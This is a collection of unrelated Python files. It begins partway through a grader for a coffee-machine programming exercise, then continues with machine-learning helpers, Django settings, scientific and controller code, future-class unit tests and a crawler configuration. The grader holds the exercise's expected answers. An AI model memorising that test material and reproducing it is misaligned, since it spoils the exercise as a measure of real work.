        return TestCase.from_stepik(
            [
                (
                    test1_input,
                    (
                        700 - 400,
                        390 - 540,
                        80 - 120,
                        7 - 9,
                        0 - 550,
                        "This test is exactly like in the example "
                        "- try to run it by yourself"
                    )
                ),
                (
                    test2_input,
                    (
                        3000,
                        3000,
                        3000,
                        3000,
                        0,
                        "This test checks \"fill\" action"
                    )
                ),
                (
                    test3_input,
                    (
                        -250,
                        0,
                        -16,
                        -1,
                        4,
                        "This test checks \"buy\" " +
                        "action with the first variant of coffee"
                    )
                ),
                (
                    test4_input,
                    (
                        -350,
                        -75,
                        -20,
                        -1,
                        7,
                        "This test checks \"buy\" " +
                        "action with the second variant of coffee"
                    )
                ),
                (
                    test5_input,
                    (
                        -200,
                        -100,
                        -12,
                        -1,
                        6,
                        "This test checks \"buy\" " +
                        "action with the third variant of coffee"
                    )
                ),
                (
                    test6_input,
                    (
                        0,
                        0,
                        0,
                        0,
                        -550,
                        "This test checks \"take\" action"
                    )
                ),
                (
                    test7_input,
                    (
                        0,
                        0,
                        0,
                        0,
                        0,
                        "This test checks \"back\" " +
                        "action right after \"buy\" action"
                    )
                ),
            ]
        )

    def check(self, reply: str, clue: Any) -> CheckResult:
        """Parse the two "remaining" reports out of the program output and
        compare their per-resource differences against the deltas in clue."""
        if len(reply.splitlines()) <= 1:
            return CheckResult.wrong('Too few lines in output')
        water_, milk_, beans_, cups_, money_, feedback = clue
        milk = []
        water = []
        beans = []
        cups = []
        money = []
        # Collect every line that starts with a number and classify it by the
        # resource keyword it mentions.
        for line in reply.splitlines():
            line = line.replace('$', '').strip()
            if len(line.split()) == 0:
                continue
            first_word = line.split()[0]
            if not first_word.isdigit():
                continue
            amount = int(first_word)
            if 'milk' in line:
                milk += amount,
            elif 'water' in line:
                water += amount,
            elif 'beans' in line:
                beans += amount,
            elif 'cups' in line:
                cups += amount,
            elif 'money' in line or 'cash' in line:
                money += amount,
        # Exactly two reports are expected -> exactly two numbers per resource.
        if len(milk) != 2:
            return CheckResult.wrong(
                "There should be two lines with \"milk\", " +
                f"found: {len(milk)}"
            )
        if len(water) != 2:
            return CheckResult.wrong(
                "There should be two lines with \"water\", " +
                f"found: {len(water)}"
            )
        if len(beans) != 2:
            return CheckResult.wrong(
                "There should be two lines with \"beans\", " +
                f"found: {len(beans)}"
            )
        if len(cups) != 2:
            return CheckResult.wrong(
                "There should be two lines with \"cups\", " +
                f"found: {len(cups)}"
            )
        if len(money) != 2:
            return CheckResult.wrong(
                "There should be two lines with \"money\", " +
                f"found: {len(money)}"
            )
        milk = milk[0], milk[-1]
        water = water[0], water[-1]
        beans = beans[0], beans[-1]
        cups = cups[0], cups[-1]
        money = money[0], money[-1]
        # Expected values are deltas: second report minus the first.
        diff = lambda item: item[1] - item[0]
        is_correct = (
            diff(water) == water_ and
            diff(milk) == milk_ and
            diff(beans) == beans_ and
            diff(cups) == cups_ and
            diff(money) == money_
        )
        return CheckResult(is_correct, feedback)
if __name__ == '__main__':
    # Entry point: run the stage tests against the student's coffee machine.
    # FIX: removed a stray "|" extraction artifact fused onto this line,
    # which made the module a syntax error.
    CoffeeMachineTest('machine.coffee_machine').run_tests()
<gh_stars>0
import numpy as np
import sklearn
from sklearn import model_selection
import logistic_regressor as lr
from sklearn import linear_model
import scipy.io
from sklearn.model_selection import KFold
######################################################################################
# The sigmoid function                                                               #
# Input:  z: can be a scalar, vector or a matrix                                     #
# Output: sig: sigmoid of scalar, vector or a matrix                                 #
######################################################################################
def sigmoid(z):
    """Elementwise logistic sigmoid: 1 / (1 + exp(-z)).

    Implements the documented TODO; works for scalars, vectors and matrices
    via numpy broadcasting.
    """
    sig = 1.0 / (1.0 + np.exp(-np.asarray(z, dtype=float)))
    return sig
######################################################################################
# The log_features transform                                                         #
# Input:  X: a data matrix                                                           #
# Output: a matrix with every element x replaced by log(x+1)                         #
######################################################################################
def log_features(X):
    """Return log(x + 1) applied elementwise.

    Implements the documented TODO; np.log1p is used for numerical accuracy
    near zero.
    """
    logf = np.log1p(X)
    return logf
######################################################################################
# The std_features transform                                                         #
# Input:  X: a data matrix                                                           #
# Output: a matrix with every column with zero mean, unit variance                   #
######################################################################################
def std_features(X):
    """Standardize each column to zero mean and unit variance.

    Returns (X_norm, mu, sigma) so the same transform can be applied to
    held-out data.
    """
    # BUG FIX: was np.np.mean, which raises AttributeError at call time.
    mu = np.mean(X, axis=0)
    sigma = np.std(X, axis=0)
    X_norm = (X - mu) / sigma
    return X_norm, mu, sigma
######################################################################################
# The bin_features transform                                                         #
# Input:  X: a data matrix                                                           #
# Output: a matrix with every element x replaced by 1 if x > 0 else 0                #
######################################################################################
def bin_features(X):
    """Binarize: 1.0 where x > 0, else 0.0 (float dtype, matching np.zeros)."""
    tX = (np.asarray(X) > 0).astype(float)
    return tX
######################################################################################
# The select_lambda_crossval function                                                #
# Inputs: X: a data matrix                                                           #
#         y: a vector of labels                                                      #
#         lambda_low, lambda_high, lambda_step: range of lambdas to sweep            #
#         penalty: 'l1' or 'l2'                                                      #
# Output: best lambda selected by 10-fold cross-validation                           #
######################################################################################
def select_lambda_crossval(X, y, lambda_low, lambda_high, lambda_step, penalty):
    """Sweep lambda over [lambda_low, lambda_high] in steps of lambda_step and
    return the value with the highest mean 10-fold CV accuracy.

    sklearn's LogisticRegression is regularized by C = 1/lambda; 'liblinear'
    is the solver that supports the l1 penalty.
    """
    best_lambda = lambda_low
    best_accuracy = -1.0
    # liblinear supports both penalties; required for l1.
    solver = 'liblinear'
    reg_lambda = lambda_low
    while reg_lambda <= lambda_high:
        folds = KFold(n_splits=10)
        fold_accuracies = []
        for train_idx, test_idx in folds.split(X):
            clf = linear_model.LogisticRegression(
                penalty=penalty, C=1.0 / reg_lambda, solver=solver)
            clf.fit(X[train_idx], y[train_idx])
            fold_accuracies.append(clf.score(X[test_idx], y[test_idx]))
        mean_accuracy = np.mean(fold_accuracies)
        if mean_accuracy > best_accuracy:
            best_accuracy = mean_accuracy
            best_lambda = reg_lambda
        reg_lambda += lambda_step
    return best_lambda
######################################################################################
def load_mat(fname):
    """Load the train/test split stored in a MATLAB .mat file.

    Returns (Xtrain, ytrain, Xtest, ytest) as numpy arrays.
    """
    contents = scipy.io.loadmat(fname)
    return (contents['Xtrain'], contents['ytrain'],
            contents['Xtest'], contents['ytest'])
def load_spam_data(fname='spamData.mat'):
    """Load the spam dataset and flatten the label columns.

    fname: path to the .mat file. GENERALIZATION: previously hard-coded to
    'spamData.mat'; the default preserves the original behavior for existing
    callers.

    Returns (Xtrain, Xtest, ytrain, ytest) with 1-D label arrays.
    """
    data = scipy.io.loadmat(fname)
    Xtrain = data['Xtrain']
    ytrain1 = data['ytrain']
    Xtest = data['Xtest']
    ytest1 = data['ytest']
    # loadmat returns (n, 1) column vectors; take the first column to get the
    # 1-D label arrays (equivalent to the original per-row list comprehension).
    ytrain = ytrain1[:, 0]
    ytest = ytest1[:, 0]
    return Xtrain, Xtest, ytrain, ytest
|
<gh_stars>0
# -*- coding: utf-8 -*-
# Django settings for mds_website project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
PROJECT_DIR = os.path.dirname(__file__)
ADMINS = (
# ('<NAME>', '<EMAIL>'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'mdsdb', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': 'postgres',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
#dont force trailing backslash
#APPEND_SLASH = False
#TASTYPIE_ALLOW_MISSING_SLASH = APPEND_SLASH
TASTYPIE_DEFAULT_FORMATS = ['json']
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = os.path.abspath(os.path.join(PROJECT_DIR, "media"))
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = os.path.abspath(os.path.join(PROJECT_DIR, "../sitestatic"))
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.abspath(os.path.join(PROJECT_DIR, "../mds-web-client/dist")),
)
STATICFILES_STORAGE = 'webpack.storage.WebpackHashStorage'
WEBPACK_ASSETS_FILE = os.path.abspath(os.path.join(PROJECT_DIR, "../mds-web-client/webpack-assets.json"))
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'use your own secret key.'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'social.apps.django_app.context_processors.backends',
'social.apps.django_app.context_processors.login_redirect',
)
# google api console: https://console.developers.google.com/project/api-access-tests/apiui/credential?authuser=0
AUTHENTICATION_BACKENDS = (
'social.backends.facebook.FacebookOAuth2',
'social.backends.google.GoogleOAuth2',
'social.backends.twitter.TwitterOAuth',
'social.backends.vk.VKOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
#SOCIAL_AUTH_GOOGLE_OAUTH2_SCOPE = ['https://www.googleapis.com/auth/profile', 'https://www.googleapis.com/auth/email']
LOGIN_REDIRECT_URL = '/'
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'apps.mds_auth.middleware.SocialAuthExceptionHandlerMiddleware'
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# python-social-auth pipeline: the library's default steps plus two
# project-specific ones (profile import and mobile-app redirect handling).
SOCIAL_AUTH_PIPELINE = (
    'social.pipeline.social_auth.social_details',
    'social.pipeline.social_auth.social_uid',
    'social.pipeline.social_auth.auth_allowed',
    'social.pipeline.social_auth.social_user',
    'social.pipeline.user.get_username',
    'social.pipeline.user.create_user',
    'apps.mds_auth.auth_pipeline.save_profile',  # get profile data from oauth resource
    'social.pipeline.social_auth.associate_user',
    'social.pipeline.social_auth.load_extra_data',
    'social.pipeline.user.user_details',
    'apps.mds_auth.auth_pipeline.device_redirect',  # change ?next parameter to provide access token for mobile apps
)
ROOT_URLCONF = 'mds_website.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'mds_website.wsgi.application'
TEMPLATE_DIRS = (
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
    os.path.join(PROJECT_DIR, 'templates'),  # PROJECT_DIR is defined earlier in this settings module
)
############# CELERY SETTINGS
## Using the database to store task state and results.
# NOTE(review): comment above says database, but the backend is amqp -- confirm which is intended.
CELERY_RESULT_BACKEND = 'amqp'
BROKER_HOST = "localhost"
#BROKER_URL = 'amqp://guest:guest@localhost:5672/celeryvhost'
CELERY_TIMEZONE = TIME_ZONE  # reuse the Django TIME_ZONE defined earlier in this module
# Enabled Django applications: the standard contrib stack, GeoDjango
# (django.contrib.gis), python-social-auth, tastypie, and the project apps.
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.admin',
    'django.contrib.admindocs',
    'django.contrib.gis',
    'social.apps.django_app.default',
    'tastypie',
    'apps.muni_scales',
    'apps.trails',
    'apps.mds_auth',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    # Silence loggers not explicitly configured below.
    'disable_existing_loggers': True,
    'formatters': {
        'verbose': {
            'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
        },
        'simple': {
            'format': '%(levelname)s %(message)s'
        },
    },
    'filters': {
        # Restricts the mail_admins handler to production (DEBUG=False).
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        },
        'console':{
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'simple'
        },
    },
    'loggers': {
        # Emails the site admins about request errors (HTTP 500).
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
        # Project logger: everything to console, errors also mailed.
        'custom': {
            'handlers': ['console', 'mail_admins'],
            'level': 'DEBUG',
        }
    }
}
# Import local settings overrides if a settings_local.py module exists.
# (Apparently using system environment variables is the better solution.)
try:
    from settings_local import *  # noqa: F401,F403 -- intentional settings-override pattern
except ImportError:
    # Only a *missing* module is tolerated.  The previous version used the
    # Python-2-only `except Exception, e:` syntax and swallowed every error,
    # which silently masked syntax/runtime errors inside settings_local.py.
    print("Could not find a local settings file.")
|
# scitbx/tests/tst_cubicle_neighbors.py
from __future__ import absolute_import, division, print_function
from six.moves import zip
def exercise_cubicles_max_memory():
  """Round-trip the cubicle memory-cap getter/setter, restoring the
  original limit before returning."""
  import scitbx.cubicle_neighbors as cn
  saved_limit = cn.cubicles_max_memory_allocation_get()
  assert saved_limit != 0
  # Set a small cap, then an unlimited (0) cap, then restore the original;
  # the getter must echo each value back exactly.
  for nbytes in (10, 0, saved_limit):
    cn.cubicles_max_memory_allocation_set(number_of_bytes=nbytes)
    assert cn.cubicles_max_memory_allocation_get() == nbytes
  # more tests in cctbx/crystal/tst_ext.py, exercise_cubicles_max_memory()
def neighbors_simple(main_sites_cart, other_sites_cart, distance_cutoff_sq):
  """Brute-force O(n*m) neighbor search used as a reference implementation.

  Maps each index j in other_sites_cart to the list of indices i in
  main_sites_cart whose squared distance to site j is <= distance_cutoff_sq.
  Indices j with no neighbors are absent from the result.

  Computes the squared distance with plain tuple arithmetic instead of
  constructing a scitbx.matrix.col per site pair, removing an unnecessary
  dependency and per-pair object allocations; results are identical.
  """
  result = {}
  for j, (xj, yj, zj) in enumerate(other_sites_cart):
    hits = [
      i
      for i, (xi, yi, zi) in enumerate(main_sites_cart)
      if (xj - xi) ** 2 + (yj - yi) ** 2 + (zj - zi) ** 2 <= distance_cutoff_sq
    ]
    if hits:
      result[j] = hits
  return result
def run(args):
  """Exercise cubicle_neighbors against the brute-force reference."""
  assert len(args) == 0
  exercise_cubicles_max_memory()
  from scitbx.cubicle_neighbors import cubicle_neighbors
  from scitbx.array_family import flex
  # Empty main set: no neighbors regardless of the query points.
  main_sites_cart = flex.vec3_double()
  cn = cubicle_neighbors(main_sites_cart=main_sites_cart, cubicle_edge=5)
  nb = cn.neighbors_of(other_sites_cart=main_sites_cart, distance_cutoff_sq=1)
  assert nb.size() == 0
  # Single-point main set: the point is its own (only) neighbor; a query
  # point farther than the cutoff finds nothing.
  for xyz in [(0,0,0), (0.1, 0.2, -0.3)]:
    main_sites_cart = flex.vec3_double([xyz])
    cn = cubicle_neighbors(main_sites_cart=main_sites_cart, cubicle_edge=5)
    nb = cn.neighbors_of(other_sites_cart=main_sites_cart, distance_cutoff_sq=1)
    assert nb.size() == 1
    assert nb.keys() == [0]  # NOTE(review): assumes keys() returns a list -- confirm under Python 3
    assert list(nb[0]) == [0]
    nb = cn.neighbors_of(
      other_sites_cart=flex.vec3_double([(2,2,2)]), distance_cutoff_sq=1)
    assert nb.size() == 0
    nb = cn.neighbors_of(
      other_sites_cart=flex.vec3_double([(2,2,2)]), distance_cutoff_sq=25)
    assert nb.size() == 1
  # Randomized cross-check against the O(n*m) reference implementation,
  # over several set sizes and cutoffs (fixed seed for reproducibility).
  mt = flex.mersenne_twister(seed=0)
  for nm in [3,5,8]:
    for no in [1,7,9]:
      main_sites_cart = flex.vec3_double(list(zip(
        mt.random_double(size=nm)*2-1,
        mt.random_double(size=nm)*2-1,
        mt.random_double(size=nm)*2-1)))
      other_sites_cart = flex.vec3_double(list(zip(
        mt.random_double(size=no)*2-1,
        mt.random_double(size=no)*2-1,
        mt.random_double(size=no)*2-1)))
      for distance_cutoff in [0.5, 1]:
        distance_cutoff_sq = distance_cutoff**2
        cn = cubicle_neighbors(main_sites_cart=main_sites_cart, cubicle_edge=1)
        nb = cn.neighbors_of(
          other_sites_cart=other_sites_cart,
          distance_cutoff_sq=distance_cutoff_sq)
        nb_simple = neighbors_simple(
          main_sites_cart=main_sites_cart,
          other_sites_cart=other_sites_cart,
          distance_cutoff_sq=distance_cutoff_sq)
        # Same set of query indices, and the same neighbor lists (order-free).
        assert sorted(nb.keys()) == sorted(nb_simple.keys())
        for j_seq,i_seqs_simple in nb_simple.items():
          i_seqs = nb[j_seq]
          assert sorted(i_seqs) == sorted(i_seqs_simple)
  print("OK")
if (__name__ == "__main__"):
  # Forward any command-line arguments (none are expected).
  import sys
  run(args=sys.argv[1:])
|
# Linux/PurePursuit/pure_pursuit.py
#!/usr/bin/env python
# ======================================================
# Copyright (C) 2020 repa1030
# This program and the accompanying materials
# are made available under the terms of the MIT license.
# ======================================================
'''
Core calculation of pure pursuit algorithm
The algorithm calculates a circle through the
current position of the car and the next waypoint.
This returns a curvature which can be converted to the
single track steering model.
'''
import math
import numpy as np
class PurePursuit:
    """Pure pursuit path-tracking controller.

    Fits a circle through the vehicle's current position and the next
    waypoint; the circle's curvature is converted into a single-track
    (Ackermann) steering angle.  Gas/brake pedal positions are derived
    from the acceleration needed to reach the waypoint target speed.
    """

    def __init__(self, cmd_velo, vehicle_mass, wheel_rad, motor_torque,
                 brake_torque, wheel_base, offset):
        self.next_wp = np.zeros(3)      # [x1, y1, z1], z1 is not used
        self.current_pos = np.zeros(3)  # [x0, y0, z0], z0 is not used
        self.max_radius = 9e10          # max steering radius; treated as "straight ahead"
        self.wheel_base = wheel_base    # wheel base [m], used for Ackermann conversion
        self.offset = offset            # offset from vehicle to clipping plane
        self.wp_velocity = cmd_velo * 1000.0 / (60.0 * 60.0)  # target speed: km/h -> m/s
        self.max_accel = motor_torque / wheel_rad / vehicle_mass  # F/m [m/s^2]
        self.max_decel = brake_torque / wheel_rad / vehicle_mass  # max braking decel [m/s^2]
        self.gas = 0.0    # last gas pedal command, 0..1
        self.brake = 0.0  # last brake pedal command, 0..1
        self.steer = 0.0  # last steering angle command [rad]

    def convertToAckermann(self, kappa):
        """Convert a path curvature to a single-track steering angle [rad]."""
        return -math.atan(self.wheel_base * kappa)

    def updatePos(self, pose):
        """Set the current vehicle position ([x, y, z]; z unused).

        BUGFIX: this previously assigned to ``self.current_pose`` (a typo),
        so ``current_pos`` silently stayed at its initial zeros and every
        distance/steering computation used the origin as the vehicle pose.
        """
        self.current_pos = pose

    def updateWp(self, wp):
        """Set the next waypoint, shifting x by the configured offset."""
        self.next_wp[0] = wp[0] + self.offset
        self.next_wp[1] = wp[1]
        self.next_wp[2] = wp[2]

    def calcCurvature(self, dist, y):
        """Pure pursuit core: curvature of the circle through pose and waypoint.

        Degenerate inputs (zero lateral offset or zero distance) and
        near-straight curvatures are clamped to 1/max_radius.  Note the
        clamp drops the curvature's sign for near-straight paths; that
        behavior is preserved as-is.
        """
        if y == 0 or dist == 0:
            curvature = 1 / self.max_radius
        else:
            curvature = 2 * y / dist / dist
        if abs(curvature) < 1 / self.max_radius:
            curvature = 1 / self.max_radius
        return curvature

    def calcDistance(self):
        """Return (euclidean distance to waypoint, lateral offset y) in the x/y plane."""
        x = self.next_wp[0] - self.current_pos[0]
        y = self.next_wp[1] - self.current_pos[1]
        dst = math.sqrt(x * x + y * y)
        return dst, y

    def calcSteeringAngle(self):
        """Update self.steer from the current pose/waypoint; return the distance.

        The current position and waypoint must be set before calling.
        """
        (dst, y) = self.calcDistance()
        kappa = self.calcCurvature(dst, y)
        self.steer = self.convertToAckermann(kappa)
        return dst

    def calcPedalPositions(self, current_velo, dst):
        """Compute gas/brake from v^2 - v0^2 = 2ax  =>  a = (v^2 - v0^2) / (2x).

        Pedal values are normalized by the maximum acceleration or
        deceleration and clipped to [0, 1].
        NOTE(review): dst == 0 raises ZeroDivisionError -- confirm callers
        guarantee a non-zero distance to the waypoint.
        """
        a = (self.wp_velocity * self.wp_velocity - current_velo * current_velo) / (2.0 * dst)
        if a < 0.0:
            # Braking is needed to slow down to the waypoint speed.
            self.gas = 0.0
            self.brake = min(abs(a / self.max_decel), 1.0)
        else:
            # Accelerate towards the waypoint speed.
            self.brake = 0.0
            self.gas = min(abs(a / self.max_accel), 1.0)

    def calcControlCommands(self, current_velo, waypoint):
        """One full control step; returns (steer [rad], brake [0..1], gas [0..1])."""
        self.updateWp(waypoint)
        dst = self.calcSteeringAngle()
        self.calcPedalPositions(current_velo, dst)
        return (round(self.steer, 4), round(self.brake, 4), round(self.gas, 4))
|
# stream/clients/python/tests/unit/bookkeeper/test_futures.py
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import mock
import pytest
from bookkeeper.kv import futures, exceptions
def _future(*args, **kwargs):
    # Convenience factory so every test builds futures the same way.
    return futures.Future(*args, **kwargs)

def test_constructor_defaults():
    # Patch threading.Event to verify the future creates exactly one Event
    # for its completion flag when none is supplied.
    with mock.patch.object(threading, 'Event', autospec=True) as Event:
        future = _future()
    assert future._result == futures.Future._SENTINEL
    assert future._exception == futures.Future._SENTINEL
    assert future._callbacks == []
    assert future._completed is Event.return_value
    Event.assert_called_once_with()

def test_constructor_explicit_completed():
    # A caller-supplied completion event must be stored as-is (identity).
    completed = mock.sentinel.completed
    future = _future(completed=completed)
    assert future._result == futures.Future._SENTINEL
    assert future._exception == futures.Future._SENTINEL
    assert future._callbacks == []
    assert future._completed is completed
def test_cancel():
    """Cancellation is unsupported: cancel() must always report False."""
    fut = _future()
    assert fut.cancel() is False

def test_cancelled():
    """Because cancel() is a no-op, cancelled() stays False as well."""
    fut = _future()
    assert fut.cancelled() is False

def test_running():
    """A future counts as running until its result arrives."""
    fut = _future()
    assert fut.running() is True
    fut.set_result('foobar')
    assert fut.running() is False

def test_done():
    """done() flips from False to True once a result has been recorded."""
    fut = _future()
    assert fut.done() is False
    fut.set_result('12345')
    assert fut.done() is True
def test_exception_no_error():
    """A successfully resolved future reports no exception."""
    fut = _future()
    fut.set_result('12345')
    assert fut.exception() is None

def test_exception_with_error():
    """exception() hands back the very object passed to set_exception."""
    err = RuntimeError('Something really bad happened.')
    fut = _future()
    fut.set_exception(err)
    # Identity (not mere equality) proves the error was not rewrapped or
    # mutated internally; the isinstance check guards against type changes.
    assert fut.exception() is err
    assert isinstance(fut.exception(), RuntimeError)
    with pytest.raises(RuntimeError):
        fut.result()

def test_exception_timeout():
    """exception() raises TimeoutError when nothing resolves in time."""
    fut = _future()
    with pytest.raises(exceptions.TimeoutError):
        fut.exception(timeout=0.01)

def test_result_no_error():
    """result() returns the stored value once one is set."""
    fut = _future()
    fut.set_result('42')
    assert fut.result() == '42'

def test_result_with_error():
    """result() re-raises the stored exception."""
    fut = _future()
    fut.set_exception(RuntimeError('Something really bad happened.'))
    with pytest.raises(RuntimeError):
        fut.result()
def test_add_done_callback_pending_batch():
    """Callbacks registered before completion are queued, not invoked."""
    fut = _future()
    cb = mock.Mock()
    fut.add_done_callback(cb)
    assert len(fut._callbacks) == 1
    assert cb in fut._callbacks
    assert cb.call_count == 0

def test_add_done_callback_completed_batch():
    """Registering a callback on a finished future fires it immediately."""
    fut = _future()
    fut.set_result('12345')
    cb = mock.Mock(spec=())
    fut.add_done_callback(cb)
    cb.assert_called_once_with(fut)

def test_trigger():
    """Setting a result fires previously queued callbacks exactly once."""
    fut = _future()
    cb = mock.Mock(spec=())
    fut.add_done_callback(cb)
    assert cb.call_count == 0
    fut.set_result('12345')
    cb.assert_called_once_with(fut)

def test_set_result_once_only():
    """A second set_result() call is rejected with RuntimeError."""
    fut = _future()
    fut.set_result('12345')
    with pytest.raises(RuntimeError):
        fut.set_result('67890')

def test_set_exception_once_only():
    """A second set_exception() call is rejected with RuntimeError."""
    fut = _future()
    fut.set_exception(ValueError('wah wah'))
    with pytest.raises(RuntimeError):
        fut.set_exception(TypeError('other wah wah'))
|
# repository: ourcolour/sobookscrawler
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
+-------------------------------------------------
@Author: cc
@Contact: <EMAIL>
@Site: http://www.xjh.com
@Project: sobookscrawler
@File: configs.py
@Version:
@Time: 2019/5/24 12:21
@Description: TO-DO
+-------------------------------------------------
@Change Activity:
1. Created at 2019/5/24 12:21
2. TO-DO
+-------------------------------------------------
'''
__author__ = 'cc'
import os.path
import platform
import random
import sys
import mongoengine as me
from utils import path_util
'''
Http Proxy
'''
rnd = random.Random()
# Candidate HTTPS proxies as 'host:port' strings; entries are toggled by
# hand (commented in/out) as proxies come and go.
HTTPS_PROXY_LIST = [
    # '172.16.58.3:9999',
    # '172.16.31.10:9999',
    # '192.168.3.11:4204',
    '172.16.31.10:4274',
    # '172.16.58.3:4276',
    # '172.16.31.10:5946',
    # '192.168.3.11:2549',
    '172.16.31.10:4230',
    '192.168.3.11:4205',
    '172.16.58.3:1246',
    '192.168.127.12:5946',
    '172.16.58.3:4212',
]
def RANDOM_PROXY(return_tuple=True):
    """Return a uniformly random proxy from HTTPS_PROXY_LIST.

    Args:
        return_tuple: when True (default) return (host, port) with port as
            an int; otherwise return the raw 'host:port' string.
    """
    # random.Random.choice is the idiomatic, equivalent form of
    # HTTPS_PROXY_LIST[rnd.randint(0, len(HTTPS_PROXY_LIST) - 1)].
    proxy = rnd.choice(HTTPS_PROXY_LIST)
    if return_tuple:
        parts = proxy.split(':')
        return parts[0], int(parts[1])
    else:
        return proxy
'''
MongoDB
'''
# Connection settings for the MongoDB backend (via mongoengine).
MONGO_HOST = 'mongodb://127.0.0.1:27017' # '192.168.2.91'
# MONGO_HOST = 'mongodb://mongo01.dev.xjh.com:27017,mongo02.dev.xjh.com:27017,mongo03.dev.xjh.com:27017/?replicaSet=xjh'
MONGO_PORT = 27017
MONGO_CONNECTION_NAME = me.DEFAULT_CONNECTION_NAME  # use mongoengine's default connection alias
MONGO_DATABASE = 'DoubanBookApi'
# MONGO_COLLECTION = 'cloud_storage'
# MONGO_COLLECTION = 'download_task'
'''
Selenium Configurations
'''
TASK_WAIT_TIMEOUT = 3 * 1000  # presumably milliseconds (3 s) -- confirm against usage
MAX_THREAD_COUNT = 1
FIREFOX_BINARY_PATH = '/Applications/Firefox.app/Contents/MacOS/firefox'
# Pick the geckodriver binary shipped under ./thirdparty next to the script,
# with a platform-specific filename on Windows.
if 'windows' == platform.system().lower():
    GECKO_EXECUTABLE_PATH = os.path.join(os.path.dirname(sys.argv[0]), 'thirdparty', 'geckodriver.exe')
else:
    GECKO_EXECUTABLE_PATH = os.path.join(os.path.dirname(sys.argv[0]), 'thirdparty', 'geckodriver')
# print('Geckodriver: {}'.format(GECKO_EXECUTABLE_PATH))
BROWSER_HEADLESS_MODE = False
'''
App Configs
'''
APP_BIN_PATH = os.path.join(path_util.get_app_path(), '..', 'bin')
SCREEN_SHOT_PATH = os.path.join(APP_BIN_PATH, 'screen-shot')
# ----------------------------------
# Use local config file `app-configs.json` (= True)
# or
# load settings from AliACM service. ( =False)
# ----------------------------------
USE_LOCAL_APP_CONFIGS = True
APP_ENV = 'prd'
# 1. If use local file:
APP_CONFIG_PATH = os.path.join(APP_BIN_PATH, 'app-config.json')
# 2. If use AliACM:
